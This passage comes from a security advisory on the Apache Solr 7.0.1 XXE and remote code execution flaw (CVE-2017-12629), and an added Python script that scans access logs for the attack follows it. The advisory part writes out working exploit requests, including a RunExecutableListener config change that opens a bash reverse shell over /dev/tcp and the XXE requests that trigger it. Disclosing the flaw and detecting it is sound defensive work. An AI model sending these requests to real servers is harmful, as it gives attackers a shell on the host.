"http://localhost:8983/solr/newcollection/select?q=xxx&qt=/solr/newcollection/config?stream.body={"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c","$@|sh",".","echo","/bin/bash","-i",">&","/dev/tcp/127.0.0.1/1234","0>&1"]}}&shards=localhost:8983/"><a></a>'}
```

As you may notice, in order to update the config we need to send a POST request to the application. But by using the XXE vulnerability we can only send HTTP GET requests. A special trick is used here: if Solr receives a "/select?q=123&qt=/xxx&shards=localhost:8983/" GET request, it actually converts it to a POST and redirects this request to the shard specified in the "shards" parameter. What is also cool, it overwrites the URL path with the "qt" parameter, so we can convert it from "/select" to "/config". The resulting HTTP request that lands on localhost:8983/ will be a POST request with stream.body="our_value". That is exactly what we need in terms of exploitation.

Step 4. Update "newcollection" through XXE to trigger execution of RunExecutableListener

```
http://localhost:8983/solr/newcollection/select?q=%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%75%70%64%61%74%65%3f%73%74%72%65%61%6d%2e%62%6f%64%79%3d%25%35%62%25%37%62%25%32%32%25%36%39%25%36%34%25%32%32%25%33%61%25%32%32%25%34%31%25%34%31%25%34%31%25%32%32%25%37%64%25%35%64%26%63%6f%6d%6d%69%74%3d%74%72%75%65%26%6f%76%65%72%77%72%69%74%65%3d%74%72%75%65%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20
```

Without URL encode:

```
http://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/newcollection/update?stream.body=[{"id":"AAA"}]&commit=true&overwrite=true"><a></a>'}
```

Step 5. When the "/bin/sh c $@|sh . echo /bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1" command is executed during the update, a new shell session will be opened on the netcat listener. An attacker can execute any shell command on the server where Solr is running.

In all three requests Solr responds with different errors, but all of these errors happen after the desired actions are executed.

All these vulnerabilities were tested on the latest version of Apache Solr with the default cloud config (bin/solr start -e cloud -noprompt).

These vulnerabilities were discovered by:
Michael Stepankin (JPMorgan Chase)
Olga Barinova (Gotham Digital Science)
id: SSV:96734
last seen: 2017-11-19
modified: 2017-10-19
published: 2017-10-19
reporter: Root
title: Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution (CVE-2017-12629)
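The three request shapes the Seebug advisory above walks through (an xmlparser query carrying a DOCTYPE, a Config API add-listener for solr.RunExecutableListener, and the qt=/config plus shards= GET-to-POST forwarding) all pass through the request line, so they can be spotted in Solr's access logs. The Python below is an added example, not code from the advisory, from Solr or from any vendor listed on this page; the log lines, IP addresses, listener body and indicator names are constructed for it.

```python
"""Flag CVE-2017-12629 exploitation attempts in Solr HTTP access logs.

Added example, not code from the Seebug advisory or from Solr. Indicator names
and the sample log lines are constructed for this demonstration.
"""
import re
from urllib.parse import quote, unquote

# Combined-log-style line: ip ident user [time] "METHOD target HTTP/x" status bytes
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# (1) XML query parser selected with a DOCTYPE: the XXE entry point.
XMLPARSER_DOCTYPE = re.compile(r"\{!xmlparser\b.*<!DOCTYPE", re.IGNORECASE)
# (2) Config API add-listener registering the command-running listener.
RUN_EXEC_LISTENER = re.compile(r"add-listener.*RunExecutableListener", re.IGNORECASE)
# (3) qt= re-pointing a /select request at /config; with shards= Solr forwards
#     it to the named shard as a POST, which is how a GET reaches the Config API.
QT_TO_CONFIG = re.compile(r"qt=/[^&\s]*config", re.IGNORECASE)


def fully_decode(text, max_rounds=4):
    """Undo nested percent-encoding. The chained exploit carries stream.body
    two levels deep inside an already URL-encoded q parameter."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify(target):
    """Return the indicator names that match one request target (path + query)."""
    decoded = fully_decode(target)
    hits = []
    if XMLPARSER_DOCTYPE.search(decoded):
        hits.append("xxe-xmlparser-doctype")
    if RUN_EXEC_LISTENER.search(decoded):
        hits.append("config-api-run-executable-listener")
    if QT_TO_CONFIG.search(decoded) and "shards=" in decoded.lower():
        hits.append("get-to-post-shard-forwarding")
    return hits


def scan(lines):
    """Return (ip, method, hits) for every parseable line with at least one hit.
    Access logs omit POST bodies, so a direct POST /config add-listener is only
    visible in Solr's own request log or through a body-capturing proxy."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = classify(m.group("target"))
        if hits:
            findings.append((m.group("ip"), m.group("method"), hits))
    return findings


def _line(ip, target, status=200):
    """Build one constructed access-log line (no real traffic)."""
    return f'{ip} - - [18/Oct/2017:10:00:00 +0000] "GET {target} HTTP/1.1" {status} 0'


# Constructed samples. The listener body mirrors the advisory's shape but only
# names /bin/echo, so no harmful command appears in the sample.
_LISTENER_JSON = ('{"add-listener":{"event":"postCommit","name":"n",'
                  '"class":"solr.RunExecutableListener","exe":"echo",'
                  '"dir":"/bin/","args":["hi"]}}')
_CHAINED_URL = ("http://localhost:8983/solr/newcollection/select?q=xxx"
                "&qt=/solr/newcollection/config?stream.body="
                + quote(quote(_LISTENER_JSON)) + "&shards=localhost:8983/")

SAMPLE_LOG = [
    # ordinary search
    _line("10.0.0.5", "/solr/gettingstarted/select?q=apache+solr&wt=json"),
    # legitimate xmlparser use without a DOCTYPE: must not fire
    _line("10.0.0.6", "/solr/gettingstarted/select?q=" + quote(
        "{!xmlparser v='<TermQuery fieldName=\"title\">solr</TermQuery>'}")),
    # the advisory's out-of-band XXE probe
    _line("203.0.113.7", "/solr/gettingstarted/select?q=" + quote(
        "{!xmlparser v='<!DOCTYPE a SYSTEM \"http://localhost:4444/executed\">"
        "<a></a>'}"), 500),
    # the word DOCTYPE in a plain search term: must not fire
    _line("10.0.0.8", "/solr/gettingstarted/select?q=DOCTYPE+declaration"),
    # XXE carrying the GET-to-POST Config API add-listener request
    _line("203.0.113.7", "/solr/newcollection/select?q=" + quote(
        "{!xmlparser v='<!DOCTYPE a SYSTEM \"" + _CHAINED_URL + "\"><a></a>'}"), 500),
]

if __name__ == "__main__":
    for ip, method, hits in scan(SAMPLE_LOG):
        print(ip, method, ", ".join(hits))
```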

References